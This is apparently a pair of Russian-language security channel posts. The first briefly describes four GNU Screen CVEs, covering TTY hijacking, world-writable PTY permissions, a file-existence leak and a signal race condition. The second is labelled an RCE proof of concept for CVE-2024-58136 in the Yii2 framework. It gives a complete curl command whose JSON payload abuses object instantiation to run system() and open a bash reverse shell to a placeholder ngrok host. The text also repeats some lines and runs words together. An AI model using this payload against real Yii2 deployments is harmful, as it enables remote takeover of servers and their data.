GNU Screen !
*
CVE-2025-46802 -
CVE-2025-46803 -
CVE-2025-46804 -
CVE-2025-46805 -
Хоть в arch, хоть в ubuntu/debian, хоть freebsd
#multiplex
*
CVE-2025-46802 -
перехват устройства TTYCVE-2025-46803 -
выставление по умолчанию прав 0622 на устройство PTY, допускающих запись любым пользователям. Проблема проявляются только в ветке screen 5.0. CVE-2025-46804 -
утечка информации о наличии файлов и каталогов в закрытых каталогах (SCREENDIR)CVE-2025-46805 -
состояние гонки при отправке сигналов SIGCONT и SIGHUPХоть в arch, хоть в ubuntu/debian, хоть freebsd
#multiplex
👍28🔥9😱7
CVE-2024–58136 — RCE PoC
*
Yii2 Framework
*
Yii2 Framework
curl -k -X POST https://sub.domain.tld/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'
👍33🔥23😱8